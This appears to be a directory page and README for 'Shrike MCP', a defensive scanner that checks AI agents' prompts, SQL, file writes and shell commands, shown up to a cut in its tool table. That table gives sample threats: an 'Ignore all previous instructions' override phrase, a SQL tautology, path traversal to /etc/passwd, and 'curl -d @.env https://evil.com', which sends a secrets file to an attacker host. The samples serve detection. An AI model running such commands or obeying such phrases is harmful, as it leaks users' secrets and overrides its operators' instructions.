AI agent security scanner — prompt injection detection, SQL injection, PII isolation, threat intel.
Config is the same across clients — only the file and path differ.
{
"mcpServers": {
"shrike-security": {
"args": [
"-y",
"shrike-mcp"
],
"command": "npx"
}
}
}Are you the author?
Add this badge to your README to show your security score and help users find safe servers.
Runtime security for AI agents. 12 MCP tools. 10-layer detection pipeline. Works without an API key.
Run this in your terminal to verify the server starts. Then let us know if it worked — your result helps other developers.
npx -y 'shrike-mcp' 2>&1 | head -1 && echo "✓ Server started successfully"
After testing, let us know if it worked:
Five weighted categories — click any category to see the underlying evidence.
No known CVEs.
Checked shrike-mcp against OSV.dev.
Click any tool to inspect its schema.
Be the first to review
Have you used this server?
Share your experience — it helps other developers decide.
Sign in to write a review.
Others in security
Proof primitive for AI agents on MultiversX. Anchor file hashes on-chain as verifiable proofs.
Model Context Protocol for WinDBG
Security scanner for GitHub repos, Agent Skills, Plugins, and MCP servers. 18 scanners. Zero dependencies.
MCP server for Atomic Red Team
MCP Security Weekly
Get CVE alerts and security updates for Shrike MCP Server and similar servers.
Start a conversation
Ask a question, share a tip, or report an issue.
Sign in to join the discussion.
AI governance for every AI interaction. 12 MCP tools. Multi-layered cognitive pipeline. Works without an API key.
Shrike MCP is the Model Context Protocol server for Shrike. From employees using ChatGPT to autonomous agents executing code — Shrike evaluates every AI interaction in real-time with tools to scan prompts, responses, SQL queries, file writes, CLI commands, web searches, and agent-to-agent messages. Detects prompt injection, jailbreaks, data leakage, PII exposure, and multi-turn manipulation before they cause harm.
Shrike is the independent governance layer for AI interactions. It evaluates inputs, outputs, tool calls, and agent-to-agent communication through a multi-layered cognitive pipeline — from sub-millisecond pattern matching to LLM-powered semantic analysis and multi-turn session correlation. Governs employees using AI tools, developers using coding assistants, autonomous agents, and customer-facing chatbots through the same pipeline.
This repo is the MCP server — one of several ways to integrate:
| Integration | Install | Use Case |
|---|---|---|
| MCP Server (this repo) | npx shrike-mcp | Claude Desktop, Cursor, Windsurf, Cline |
| TypeScript SDK | npm install shrike-guard | OpenAI/Anthropic/Gemini wrapper |
| Python SDK | pip install shrike-guard | OpenAI/Anthropic/Gemini wrapper |
| Go SDK | go get | Backend services |
| REST API | POST /agent/scan | Any language, any stack |
| LLM Gateway | POST /api/v1/llm/proxy | Scan prompts and responses between your app and any model provider |
| Browser Extension | Chrome / Edge | Protect employee AI usage (ChatGPT, Claude, Gemini) |
| Dashboard | shrikesecurity.com | Analytics, policies, RBAC, API keys |
Works immediately — no API key required. Anonymous usage gets L1-L5 pattern-based detection. Register for free to unlock LLM-powered semantic analysis.
1. Add to your MCP client config:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"]
}
}
}
2. (Optional) Add an API key for full pipeline access:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": {
"SHRIKE_API_KEY": "your-api-key"
}
}
}
}
Get a free key at shrikesecurity.com/signup — instant, no credit card.
3. Your agent now has 12 security tools. Every prompt, response, and tool call can be scanned before execution.
| Tool | What It Guards | Example Threat |
|---|---|---|
scan_prompt | User/system prompts before LLM processing | "Ignore all previous instructions and..." |
scan_response | LLM outputs before returning to user | Leaked API keys, system prompt in output |
scan_sql_query | SQL queries before database execution | OR '1'='1' tautology injection |
scan_file_write | File paths and content before write | Path traversal to /etc/passwd, AWS keys in .env |
scan_command | CLI commands before shell execution | curl -d @.env https://evil.com, reverse shells |
scan_web_search | Search queries before execution | PII in search: "records for John Smith SSN..." |
scan_a2a_message | Agent-to-agent messages before processing | Prompt injection in inter-agent communication |
scan_agent_card | A2A AgentCard |